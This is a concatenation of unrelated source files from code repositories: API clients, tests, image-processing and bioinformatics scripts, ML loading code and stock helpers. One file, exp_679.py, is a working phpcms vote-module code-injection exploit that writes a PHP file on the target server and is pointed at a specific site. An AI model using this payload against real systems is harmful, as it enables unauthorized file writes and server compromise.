return self._make_request(access_tokens_endpoint, method, **kwargs)
def _get_access_tokens_endpoint(self, session_id):
return ACCESS_TOKENS_ENDPOINT.format(self.website_id, session_id)
def _get_session_start_timestamp(self, session_id):
endpoint = SESSION_ENDPOINT.format(self.website_id, session_id)
response = self._make_request(endpoint, "GET")
if response.status_code == requests.codes.OK:
return json.loads(response.content).get("client_start")
def _make_request(self, endpoint, method, **kwargs):
url = self.api_url + endpoint
request_kwargs = {"method": method, "headers": self.request_headers}
body = kwargs.get("body")
if body:
request_kwargs["json"] = body
return safe_urlopen(url, **request_kwargs)
class UnauthorizedError(Exception):
pass
class InvalidWebsiteIdError(Exception):
pass
class InvalidApiUrlError(Exception):
pass
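# Minimal usage sketch (hedged): the credentials, website ID and session ID below are
# placeholders, and network access to the SessionStack API is required.
def _sessionstack_example():
    client = SessionStackClient(
        account_email="user@example.com",
        api_token="API_TOKEN",
        website_id="WEBSITE_ID",
    )
    client.validate_api_access()  # may raise UnauthorizedError / InvalidWebsiteIdError / InvalidApiUrlError
    return client.get_session_url(session_id="SESSION_ID", event_timestamp=None)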
|
[
"noreply@github.com"
] |
nagyist.noreply@github.com
|
f5dff936815d2f26b852c4ae10f5bf7d9e9004b8
|
ed569623f4686688edac40c2dabde0206546316b
|
/tests/unit/models/company_test.py
|
00eea0a1fdd38459098b429e193dbf491738925e
|
[] |
no_license
|
leobene/RadarMiles
|
34753114854f9dff7ee781060c2f99ec3a54d468
|
9810b04f29ba5a514dfcbfb0679f304f93842d37
|
refs/heads/master
| 2020-04-08T09:13:02.806563
| 2018-12-03T23:46:58
| 2018-12-03T23:46:58
| 159,213,641
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 711
|
py
|
from models.company import CompanyModel
from tests.base_test import BaseTest
class CompetitionTest(BaseTest):
def test_create_competition(self):
company = CompanyModel('GOL')
self.assertEqual(company.name, 'GOL',
"The name of the company after creation does not equal the constructor argument.")
def test_competition_json(self):
company = CompanyModel('GOL')
expected = {
'id': company.id,
'name': company.name,
}
self.assertEqual(
company.json(),
expected,
"The JSON export of the company is incorrect. Received {}, expected {}.".format(company.json(), expected))
|
[
"leobene@192.168.0.100"
] |
leobene@192.168.0.100
|
3a4928e43a8d2eb7a9e58b5e4c3c04eee176b3f5
|
0798277f2706998ab80442ac931579eb47f676e5
|
/bin/metric-markdown
|
ed615b4e0809a60c37d486fe5df8f258f20d47d9
|
[
"Apache-2.0"
] |
permissive
|
isabella232/pulse-api-cli
|
49ed38b0694ab289802f69ee6df4911cf3378e3f
|
b01ca65b442eed19faac309c9d62bbc3cb2c098f
|
refs/heads/master
| 2023-03-18T00:23:15.295727
| 2016-05-13T15:44:08
| 2016-05-13T15:44:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 817
|
#!/usr/bin/env python
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import MetricMarkdown
"""
Reads the plugin.json manifest file, looks up the definition, and then outputs a markdown table
"""
if __name__ == "__main__":
c = MetricMarkdown()
c.execute()
|
[
"davidg@boundary.com"
] |
davidg@boundary.com
|
|
6e295f76fbefde92e0f7d98a4c2ea8a9eb480c01
|
71e6546941d2763946b69800dfb15679fab70d14
|
/image_process.py
|
7b0734e9d6eda4d01c3dc08c071991c44d18d957
|
[] |
no_license
|
ruitengchang/private
|
510d58d1ca5ad5cc7ec7147f0ae00249f38da0a4
|
f9ac73cd1f21d4f1febc0abca627bb1fce2fe3a5
|
refs/heads/master
| 2020-06-05T17:12:34.768517
| 2019-06-18T09:52:55
| 2019-06-18T09:52:55
| 192,493,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,368
|
py
|
import cv2 as cv
import numpy as np
import os
def line_image(image):
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
#cv.imshow("gray",gray)
edges = cv.Canny(gray, 100, 500, apertureSize=3)
#cv.imshow("canny",edges)
# contours,hierarchy=cv.findContours(edges,cv.RETR_LIST,cv.CHAIN_APPROX_SIMPLE)
# point_size=1
# point_color=(0,0,255)
# thickness=4
# print("contours",np.array(contours).shape)
# for i in range(np.array(contours).shape[0]):
# cv.circle(image,(contours[i][0][0][0],contours[i][0][0][1]),point_size,point_color,thickness)
# cv.imshow("result",image)
#cv.imshow("lunkuo",contours)
#r,g,b=cv.split(image)
# cv.connectedComponents(r)
# cv.imshow("conn",cv.merge([r,r,r]))
#print("dian:",hierarchy)
#print("dian shape:",hierarchy.shape)
lines = cv.HoughLines(edges, 1, np.pi / 2, 190)
#print("lines:",lines.shape)
#print(lines)
col=[]
row=[]
#print(col)
#print("----")
for line in lines:
rho, theta = line[0]
if(theta<1):
col.append(rho)
else:
row.append(rho)
a = np.cos(theta)
b = np.sin(theta)
x0 = a * rho
y0 = b * rho
x1 = int(x0 + 2000 * (-b))
y1 = int(y0 + 2000 * (a))
x2 = int(x0 - 2000 * (-b))
y2 = int(y0 - 2000 * (a))
cv.line(image, (x1, y1), (x2, y2), (0, 0, 255), 2)
#cv.imshow("hough", image)
return col,row
def judge(image,p1,p2,p3,p4):
count=0.0
r,g,b=cv.split(image)
#print(r.shape)#(1080,550)
total=float((abs(p4[0]-p1[0]))*(abs(p4[1]-p1[1])))
for i in range(int(abs(p4[0]-p1[0]))):
for j in range(int(abs(p4[1]-p1[1]))):
x=int(i+p1[0])
y=int(j+p1[1])
if(x>=r.shape[1]):
x=r.shape[1]-1
if(y>=r.shape[0]):
y=r.shape[0]-1
if(r[y][x]!=255):
count=count+1
if(count/total>0.8):
#print("find one")
return 1
else:return 0
def mkdir(path):
    # import the os module
    import os
    # strip leading/trailing whitespace
    path = path.strip()
    # strip a trailing backslash
    path = path.rstrip("\\")
    # check whether the path already exists
    # exists -> True
    # does not exist -> False
    isExists = os.path.exists(path)
    # act on the result
    if not isExists:
        # the directory does not exist, so create it
        os.makedirs(path)
        print(path + ' created successfully')
        return True
    else:
        # the directory already exists, so do not create it and report that fact
        print(path + ' already exists')
        return False
def img_process(input):
src = cv.imread(input)
_x=src.shape[1]
_y=src.shape[0]
b,g,r=cv.split(src)
for i in range(b.shape[0]):
for j in range(b.shape[1]):
if(b[i][j]!=255):
b[i][j]=0
    src_merged=cv.merge([b,b,b])  # src: original image, src_merged: binarized image; run line detection on both and combine the two results
    #cv.imshow("merged",src_merged)
    #line_image(src)  # line detection on the original image
    col,row=line_image(src_merged)  # line detection on the binarized image
col.sort()
row.sort()
if(col[0]>0):
col.append(0)
col.sort()
if(col[len(col)-1]<_x):
col.append(_x)
if(row[0]>0):
row.append(0)
row.sort()
if(row[len(row)-1]<_y):
row.append(_y)
#print(row)
#print(col)
result=[]
for i in range(len(col)-2):
for j in range(len(row)-2):
p1=[col[i],row[j]]
p2=[col[i+1],row[j]]
p3=[col[i],row[j+1]]
p4=[col[i+1],row[j+1]]
if(judge(src_merged,p1,p2,p3,p4)==1):
result.append([p1,p2,p3,p4])
#print("result",np.array(result).shape)
#print(result)
# for i in range(len(result)):
# print(tuple(result[i]))
# cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2)
# cv.imshow("rec",src_merged)
    while(1):  # check whether neighbouring regions can be merged; keep merging while possible
do_sth=0
for i in range(len(result)):
for j in range(len(result)-i-1):
if((result[i][1]==result[j][0]) & (result[i][3]==result[j][2])):
result.append([result[i][0],result[j][1],result[i][2],result[j][3]])
result.remove(result[i])
result.remove(result[j-1])
do_sth=1
break
if(do_sth==1):
break
if(do_sth==0):
break
#print(result)
# for i in range(len(result)):
# print(tuple(result[i]))
# cv.rectangle(src_merged,tuple(result[i][0]),tuple(result[i][3]),(0,255,0),2)
# cv.imshow("rec",src_merged)
for i in range(len(result)):
new_img=src[int(result[i][0][1]):int(result[i][2][1]),int(result[i][0][0]):int(result[i][1][0])]
#cv.imshow("new%d"%(i),new_img)
path=input.split(".")
#mkdir("%s"%(path[0]))
#os.chdir("%s"%(path[0]))
filename="%snew%d.jpg"%(path[0],i)
print(filename)
cv.imwrite(filename,new_img)
os.chdir("image_example/1/")
print("out path:",os.getcwd())
files=os.listdir()
for file in files:
img_process(file)
cv.waitKey(0)
cv.destroyAllWindows()
|
[
"noreply@github.com"
] |
ruitengchang.noreply@github.com
|
95d38eb622dd57ea6cf2bba55e5202edeb6e0e3b
|
43ff15a7989576712d0e51f0ed32e3a4510273c0
|
/tools/pocs/bugscan/exp_679.py
|
798104fb95f83ba1ff04752dfd711df064cc3623
|
[] |
no_license
|
v1cker/kekescan
|
f2b51d91a9d6496e2cdc767eb6a600171f513449
|
3daa1775648439ba9e0003a376f90b601820290e
|
refs/heads/master
| 2020-09-19T16:26:56.522453
| 2017-06-15T02:55:24
| 2017-06-15T02:55:24
| 94,495,007
| 6
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,954
|
py
|
# -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
# !/usr/bin/dev python
# -*- coding:utf-8 -*-
"""
reference:
http://www.wooyun.org/bugs/wooyun-2015-0104157
http://www.beebeeto.com/pdb/poc-2015-0086/
"""
import re
import urllib
import urllib2
import base64
import random
def get_vote_links(args):
vul_url = args
vote_url = '%sindex.php?m=vote' % vul_url
code, head, res, _, _ = curl.curl(vote_url)
ids = []
for miter in re.finditer(r'<a href=.*?subjectid=(?P<id>\d+)', res, re.DOTALL):
ids.append(miter.group('id'))
if len(ids) == 0:
return None
return list(set(ids))
def assign(service, args):
if service == 'phpcms':
return True, args
pass
def audit(args):
vul_url = args
ids = get_vote_links(args)
file_name = 'w2x5Tt_%s.php' % random.randint(1,3000)
base64_name = base64.b64encode(file_name)
if ids:
for i in ids:
exploit_url = '%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % (vul_url, i)
payload = {'subjectid': 1,
'radio[]': ');fputs(fopen(base64_decode(%s),w),"vulnerable test");' % base64_name}
post_data = urllib.urlencode(payload)
code,head,body,_,_=curl.curl('-d "%s" %s' % (post_data, exploit_url))
if code==200:
verify_url = '%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % (vul_url, i)
code,head,body,_,_=curl.curl(verify_url)
if code==200:
shell_url = '%s%s' % (vul_url, file_name)
code, head, res, _, _ = curl.curl(shell_url)
if code == 200 and 'vulnerable test' in res:
security_hole(vul_url)
if __name__ == "__main__":
from dummy import *
audit(assign('phpcms', 'http://www.jkb.com.cn/')[1])
|
[
"liyueke@huobi.com"
] |
liyueke@huobi.com
|
63cf85af944332bdcc3cf505a3931ab50cb64c0f
|
600f361ac85c87dbc3a17cf3908dc0f4267a8c94
|
/quality-trim.py
|
2c2ac719751b4fb20d6f92a2f88d1c78ab76ac60
|
[] |
no_license
|
LeeBergstrand/Bioinformatics_scripts
|
801f00ea5d4346daf00f92d331f4a87737280ddd
|
0cfab04ecf43cf4f0aeba2d713532190cfc5eed1
|
refs/heads/master
| 2021-01-15T15:23:43.455647
| 2015-05-05T05:25:55
| 2015-05-05T05:25:55
| 19,826,979
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,170
|
py
|
#!/usr/bin/env python
import sys
import screed
import gzip
# python quality-trim.py <input fastq file> <output filtered fastq file>
# MINLENGTH is the minimum length of read desired. Reads that still contain 'N' base calls after trailing-N trimming are removed.
MINLENGTH = 30
filein = sys.argv[1]
fileout = sys.argv[2]
fw = open(fileout, 'w')
count=0
for n, record in enumerate(screed.open(filein)):
name = record['name']
sequence = record['sequence']
accuracy = record['accuracy']
sequence = sequence.rstrip('N')
accuracy = accuracy[:len(sequence)]
if 'N' in sequence:
continue
else:
trim = accuracy.find('B')
if trim > MINLENGTH or (trim == -1 and len(sequence) > MINLENGTH):
if trim == -1:
fw.write('@%s\n%s\n+\n%s\n' % (name, sequence, accuracy))
else:
fw.write('@%s\n%s\n+\n%s\n' % (name, sequence[:trim], accuracy[:trim]))
count += 1
if n % 1000 == 0:
print 'scanning', n
print 'Original Number of Reads', n + 1
print 'Final Number of Reads', count
print 'Total Filtered', n + 1 - int(count)
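# Standalone illustration (hedged, not used by the pipeline above): the trimming rule
# cuts a read at the first 'B' quality call and keeps it only if the remainder is
# longer than MINLENGTH.
def _trim_rule_example():
    seq = 'ACGTACGTACGTACGTACGTACGTACGTACGTACGT'
    acc = 'IIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIBBBB'
    trim = acc.find('B')
    if trim > MINLENGTH or (trim == -1 and len(seq) > MINLENGTH):
        return seq[:trim] if trim != -1 else seq
    return None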
|
[
"carden24@mail.ubc.ca"
] |
carden24@mail.ubc.ca
|
db3d9f7ffa0daf93dc6ef9d1b818888be5ac8e5d
|
93afa6da4a41e6346079cf437aa11fe27ae84d93
|
/venv/bin/easy_install
|
c86211b025ea693cb90960dd17d613e34059f37e
|
[] |
no_license
|
alexbatashev/rungekutta
|
20695e3d0706b7cfde2f7b4c0150e74122b4a6d5
|
7c71228b6bbbeebe0771b45e4d85c342f2d2fdd7
|
refs/heads/master
| 2020-05-05T06:56:03.982750
| 2019-04-07T08:29:28
| 2019-04-07T08:29:28
| 179,806,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
#!/Users/aleksandrbatasev/PycharmProjects/rungekutta/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==39.1.0','console_scripts','easy_install'
__requires__ = 'setuptools==39.1.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==39.1.0', 'console_scripts', 'easy_install')()
)
|
[
"alexbatashev@outlook.com"
] |
alexbatashev@outlook.com
|
|
f898a507fb5c8d1476d837dc594f7b5fa3b68cd6
|
b80b3b82bb1f4c4019e56bf6eed859d9e1ec024b
|
/python/tolower.py
|
4b443cc2001eef828e7353d23079405cbb61b962
|
[] |
no_license
|
NotaCSstudent/leetcode
|
be484537f20302557411ed0a2d653703b4c86abe
|
13c3fc89e492209f70fcb8e7756c8553f5736a1e
|
refs/heads/main
| 2023-06-08T22:59:41.680890
| 2021-06-20T13:37:46
| 2021-06-20T13:37:46
| 372,983,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
class Solution:
def toLowerCase(self, s: str) -> str:
s = s.lower()
return s
|
[
"noreply@github.com"
] |
NotaCSstudent.noreply@github.com
|
d31bf01470b66161944add4d5f0c467767484f48
|
1a7ac4eb338f53e96f92c84d560fd1707607bcc9
|
/ENV/bin/jupyter
|
3897bd35c4d09274ecf81879fcf8337d7d1c9519
|
[] |
no_license
|
kuwar/data-science-python-1
|
cf3d04dbcf3e57fe6976be7e2f3371ee0eb3304f
|
2738d00cb339c250fdeca30ad84d9be7ca87e570
|
refs/heads/master
| 2022-10-18T09:15:56.181434
| 2019-09-10T06:39:44
| 2019-09-10T06:39:44
| 207,480,173
| 0
| 1
| null | 2022-10-13T06:11:52
| 2019-09-10T06:20:01
|
Python
|
UTF-8
|
Python
| false
| false
| 265
|
#!/home/saurav/Documents/GitHub/Python/second/ENV/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_core.command import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"skuwar@olivemedia.co"
] |
skuwar@olivemedia.co
|
|
4aff36fdb71b2bbc4fd29e2773506848f06a1fd6
|
8a7d5d67052892dd5d2a748282958f6244d963c6
|
/google-cloud-sdk/lib/surface/app/domain_mappings/delete.py
|
32842caf145b27ecec1a4e5410e7656b9643a037
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KisleK/capstone
|
7d1d622bd5ca4cd355302778a02dc6d32ed00c88
|
fcef874f4fcef4b74ca016ca7bff92677673fded
|
refs/heads/master
| 2021-07-04T03:29:44.888340
| 2017-07-24T16:16:33
| 2017-07-24T16:16:33
| 93,699,673
| 0
| 2
| null | 2020-07-24T22:44:28
| 2017-06-08T02:34:17
|
Python
|
UTF-8
|
Python
| false
| false
| 1,812
|
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for deleting an App Engine domain mapping."""
from googlecloudsdk.api_lib.app.api import appengine_domains_api_client as api_client
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
"""Deletes a specified domain mapping."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To delete an App Engine domain mapping, run:
$ {command} '*.example.com'
""",
}
@staticmethod
def Args(parser):
flags.DOMAIN_FLAG.AddToParser(parser)
def Run(self, args):
console_io.PromptContinue(
prompt_string=('Deleting mapping [{0}]. This will stop your app from'
' serving from this domain.'.format(args.domain)),
cancel_on_no=True)
if self.ReleaseTrack() == base.ReleaseTrack.ALPHA:
client = api_client.AppengineDomainsApiAlphaClient.GetApiClient()
else:
client = api_client.AppengineDomainsApiClient.GetApiClient()
client.DeleteDomainMapping(args.domain)
log.DeletedResource(args.domain)
|
[
"kisle.kuhn1@gmail.com"
] |
kisle.kuhn1@gmail.com
|
3c7e5c0670bdcf86f8a00bc3574132e66221f1ea
|
579f04eda7851cd89e04cd39ecf48a0d09f63244
|
/mandala/sketch_cat.pyde
|
4655f0ece0ab99fab7be7870be78a7ab91572cb4
|
[] |
no_license
|
jralipe/ccs221
|
0f378492a380b292e35ff7ec27b4e37cb1992726
|
c70f7834c707c089d2ce01a54b9eda70f50c418f
|
refs/heads/master
| 2020-12-28T18:22:15.919736
| 2020-05-29T00:48:53
| 2020-05-29T00:48:53
| 238,438,446
| 3
| 27
| null | 2020-03-05T11:31:06
| 2020-02-05T11:52:29
|
Python
|
UTF-8
|
Python
| false
| false
| 3,287
|
pyde
|
#Nyancat by Maria Arlyn Fuerte
#BSCS1A
catx = 0
caty = 0
flag = True
def setup():
size(900, 600)
background(25, 25, 112)
def draw():
global catx
global caty
global flag
noStroke()
background(25, 25, 112)
fill(255, 0, 0) #RED
rect(0, caty +150, 200, 20)
fill(255, 165, 0) #ORANGE
rect(0, caty +170, 200, 20)
fill(255, 255, 0) #YELLOW
rect(0, caty + 190, 200, 20)
fill(0, 128, 0) #GREEN
rect(0, caty +210, 200, 20)
fill(0, 0, 255) #BLUE
rect(0, caty +230, 200, 20)
fill(75, 0, 130) #Violet
rect(0, caty +250, 200, 20)
if caty > 280:
flag = False
if caty > 200:
catx +=1
if catx > 250:
caty -=1
if caty < 50:
catx -=1
if catx < 30:
caty +=1
#Pikabody
fill(160)
rect(200, caty +135, 180, 150)
fill(100)
rect(215, caty +150, 150, 120)
fill(160)
rect(215, caty +150, 10, 10)
rect(355, caty +150, 10, 10)
rect(215, caty +260, 10, 10)
#BELT
fill(255)
rect (240, caty+ 130, 30, 170)
#Shadow
fill(0)
rect(190, caty +145, 10, 150) #left
rect(380, caty +145, 10, 150) #right
rect(200, caty +285, 180, 10) #bottom
rect(210, caty +130, 160, 10) #top
rect(200, caty +135, 10, 10) #left
rect(370, caty +135, 10, 10) #right
rect(190, caty +280, 20, 10)
rect(180, caty +290, 10, 20)# backfeet left
rect(180, caty +310, 30, 10)#backfeet bottom
rect(210, caty +290, 10, 20) #backfeet right
rect(230, caty +290, 10, 20)
rect(240, caty +310, 20, 10)
rect(260, caty +290, 10, 30)
#backfeet
fill(160)
rect(190, caty +290, 20, 20)
rect(240, caty +290, 20, 20)
#head
fill(0)
rect(295, caty +220, 140, 40)
rect(305, caty +210, 120, 15)
rect(315, caty +205, 35, 8)
rect(380, caty +205, 35, 8)
rect(315, caty +197, 25, 8)
rect(390, caty +197, 25, 8)
rect(323, caty +189, 10, 8)
rect(398, caty +189, 10, 8)
rect(305, caty +255, 120, 15)
rect(315, caty +270, 100, 20)
rect(320, caty +290, 15, 10)
rect(330, caty +300, 20, 10)
rect(370, caty +290, 15, 10)
rect(380, caty +300, 20, 10)
fill(128)
rect(330, caty +290, 20, 10)
rect(380, caty +290, 20, 10)
rect(315, caty +225, 110, 30)
#eyes
fill(20, 20, 20)
rect(340, caty +230,20, 20)
rect(380, caty +230, 20, 20)
fill(235, 235, 235)
rect(350, caty +240, 10, 10)
rect(390, caty +240, 10, 10)
#cheeks
fill(250, 182, 193)
circle(322, caty +248, 15)
circle(418, caty +248, 15)
#SWORD
fill(50)
rect(400, caty +290, 30, 20)
rect(430, caty +280, 30, 40)
fill(255)
rect(460, caty +290, 90, 20)#BLADE
#shadow
fill(0)
rect(390, caty +300, 10, 20)
rect(400, caty+ 310, 40, 10)
rect(430, caty +320, 40, 10)
rect(460, caty +310, 90, 10)
rect(550, caty +290, 10, 30)
rect(460, caty +280, 90, 10)
rect(420, caty +270, 50, 10)
rect(410, caty +280, 20, 10)
rect(540, caty +290, 10, 10)
|
[
"noreply@github.com"
] |
jralipe.noreply@github.com
|
04aaeca81365d84683d423d2113d3dca18c1ddb6
|
6451afeb63ae2be4974cab898e1f72d3d5633d72
|
/gmailsync/utils.py
|
fc8018f7c83296daadc1a88c73cf96d850af8835
|
[
"Apache-2.0"
] |
permissive
|
albertoalcolea/gmailsync
|
f8fb8bd6bee3911482b6ef64f99d714682405938
|
cf2c1f074c24234284e1cfc2949341df1a9899ba
|
refs/heads/master
| 2022-05-02T22:40:46.881024
| 2022-04-14T17:08:28
| 2022-04-14T17:08:28
| 217,107,647
| 4
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 504
|
py
|
import itertools
import os
def chunked(iterable, size):
it = iter(iterable)
while True:
chunk = tuple(itertools.islice(it, size))
if not chunk:
break
yield chunk
def expand_path(path):
"""
Convert relative paths to absolute paths expanding environment variables, and '~' to
represent the user $HOME directory in filenames.
:param path: path to be expanded.
"""
return os.path.abspath(os.path.expandvars(os.path.expanduser(path)))
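# Usage sketch for the two helpers above (illustrative values only).
if __name__ == '__main__':
    for chunk in chunked(range(7), 3):
        print(chunk)                       # (0, 1, 2), then (3, 4, 5), then (6,)
    print(expand_path('~/mail/$USER'))     # absolute path with '~' and $USER expanded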
|
[
"albertoalcolea@gmail.com"
] |
albertoalcolea@gmail.com
|
0f9da5641c14d6d47418ae74359cbd602a3a8681
|
178eb0567fd21b65df6f95d7342d971fb253f91e
|
/AI/Classifiers/models/load.py
|
d0adbb5c1c02bded01575f019398c91e8808eb4a
|
[] |
no_license
|
Zhaofan-Su/SemanticAnalysis
|
defacbcde5f6c541de9c4cfa37138a449c03ce60
|
f28813bf21d6170ffe826dd7edcad73cc244da9b
|
refs/heads/master
| 2020-05-07T11:59:15.138559
| 2019-04-23T00:53:45
| 2019-04-23T00:53:45
| 180,484,689
| 0
| 0
| null | 2019-04-17T02:46:54
| 2019-04-10T02:20:34
|
Python
|
UTF-8
|
Python
| false
| false
| 2,124
|
py
|
import os
import torch
import torch.nn.functional as F
import datetime
import torch.autograd as autograd
import jieba.posseg as pseg
from .fasttext import FastText
import torchtext.data as data
from .input import Dataset
from torchtext.vocab import Vectors
import os.path as path
def _chinese_tokenizer(sentence):
exclusion = ["e", "x", "y"] # e 叹词 x 非语素词 y 语气词
return [word for (word, flag) in pseg.cut(sentence) if flag not in exclusion]
def load_data(target, config):
text_field = data.Field(tokenize=_chinese_tokenizer)
label_field = data.Field(sequential=False)
train_data, test_data = Dataset.split(target, text_field, label_field, config)
embedding = path.join(path.dirname(path.abspath(__file__)), config.PRETRAINED_EMBEDDING)
cache = path.join(path.dirname(path.abspath(__file__)), ".vector_cache/")
weights = Vectors(name=embedding, cache=cache)
text_field.build_vocab([{key: 1} for key in weights.itos], vectors=weights)
label_field.build_vocab(train_data)
config.EMBED_NUM = len(text_field.vocab)
config.EMBED_DIM = len(weights.vectors[0])
config.CLASS_NUM = len(label_field.vocab) - 1
return text_field, label_field
def load_model(model_name, ckpt, text_field, config):
model = None
if model_name == "FastText":
model = FastText(config, text_field.vocab.vectors)
if config.CUDA:
torch.cuda.set_device(config.DEVICE)
model = model.cuda()
device = config.DEVICE if config.CUDA else "cpu"
model.load_state_dict(torch.load(path.join(path.dirname(path.abspath(__file__)), ckpt), map_location=device))
return model
def predict(model, text_field, label_field, sentence, config):
model.eval()
sentence = text_field.preprocess(sentence)
# while len(sentence) < 3:
# sentence.append("<pad>")
sentence = [[text_field.vocab.stoi[x] for x in sentence]]
x = torch.tensor(sentence)
x = autograd.Variable(x)
if config.CUDA:
x = x.cuda()
output = model(x)
_, pred = torch.max(output, 1)
return label_field.vocab.itos[pred.data[0]+1] == "0"
|
[
"nee_11235@qq.com"
] |
nee_11235@qq.com
|
7f7bc5dacb84f4e18c258d76fd91a9bb8cc3af3b
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/CodeJamData/12/23/12.py
|
da0396d4cf15e8267cd6d9041247bc41bc9c3b63
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,511
|
py
|
# -*- coding:utf-8 -*-
import os, itertools
curr_dir = os.path.dirname(os.path.abspath(__file__))
srcfilename = os.path.join(curr_dir, 'C-large.in')
dstfilename = os.path.join(curr_dir, 'output.txt')
def solve(numbers_):
numbers = sorted(numbers_)
memory = dict((k, [k]) for k in numbers)
for r in xrange(2, len(numbers)):
combinations = itertools.combinations(numbers, r)
for combination in combinations:
s = sum(combination)
if s in memory:
r1 = memory[s]
r2 = combination
return r1, r2
memory[s] = combination
return 'Impossible'
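# Illustrative call (an editorial note, not part of the original submission): the first sum collision
# yields two sub-multisets with equal totals, e.g. solve([1, 2, 3, 4, 6]) returns ([3], (1, 2)).
# The two results are not guaranteed to be disjoint; shared elements can be dropped from both
# sides without breaking the equality of the sums.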
if __name__ == '__main__':
with open(srcfilename, 'rb') as inp:
with open(dstfilename, 'wb') as outp:
lines = inp.readlines()
count = int(lines.pop(0))
outlines = []
for i in xrange(count):
line = lines[i]
numbers = [int(number) for number in line.split(' ')]
numbers.pop(0)
result = solve(numbers)
if result == 'Impossible':
outlines.append('Case #%d: Impossible\n' % (i+1,))
else:
r1, r2 = result
outlines.append('Case #%d:\n' % (i+1,))
outlines.append('%s\n' % ' '.join(['%d' % r1i for r1i in r1]))
outlines.append('%s\n' % ' '.join(['%d' % r2i for r2i in r2]))
outp.writelines(outlines)
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
a2996d418df380689d0ce270efb07b78628d4bc2
|
6f98d1667a5c9d55d0a74dcee77b5c3c777653a5
|
/source/ma20/analysis_stock.py
|
8f57162586da3109aaf4f8b18d1301f607c63bb7
|
[] |
no_license
|
llzhi001/stock_strategy
|
55efec1ed95d9ba862fd71f705a5cca8ad3af751
|
237f9ccda0c806f06b99374a5680c5cb70c07899
|
refs/heads/master
| 2020-12-08T13:19:59.083121
| 2018-04-03T17:09:54
| 2018-04-03T17:09:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,643
|
py
|
# coding=utf-8
'''
Created on Nov 7, 2017-12:40:31 AM
@author: yubangwei_pc
'''
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
import tushare as ts
from datetime import datetime
# Consider fitting the 20-day moving average and taking its derivative instead?
m20_para = {'not_rising_days':5, # not rising for not_rising_days consecutive days => the 20-day MA is flat or falling
'const_rising_days':3 # rising for const_rising_days consecutive days => the 20-day MA has started to rise
}
def is_rising(his_data_df, judge_para='ma20', const_times=3):
'''
If the value does not increase for not_rising_days consecutive points and then increases for
const_rising_days consecutive points, it is considered rising, i.e. a turning point has appeared.
Note: keep the function single-purpose; it only judges a rising edge (or a falling edge).
'''
if None is his_data_df:
return False
recent_risng_days_th = const_times
if len(his_data_df) < recent_risng_days_th :
return False
for i in range(recent_risng_days_th):
if his_data_df[judge_para][0+i] <= his_data_df[judge_para][1+i]:
return False
return True
def is_not_rising(his_data_df, judge_para='ma20', const_not_rising_times=5):
if None is his_data_df:
return False
if len(his_data_df) < const_not_rising_times :
return False
for i in range(const_not_rising_times):
if his_data_df[judge_para][0+i] > his_data_df[judge_para][1+i]:
return False
return True
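# Illustrative sanity check of the two judge functions above (an editorial sketch, not part of the
# original script). The demo frame mimics tushare.get_hist_data(): rows are newest-first and the
# index is a date string, so the positional-style lookups his_data_df['ma20'][i] behave as the
# script expects on the pandas versions it targets.
def _demo_turning_point():
    idx = ['2017-11-%02d' % d for d in range(9, 0, -1)]
    demo = pd.DataFrame({'ma20': [10.6, 10.5, 10.4, 10.2, 10.2, 10.2, 10.2, 10.2, 10.2]}, index=idx)
    rising = is_rising(demo, 'ma20', m20_para['const_rising_days'])        # newest 3 values strictly increase
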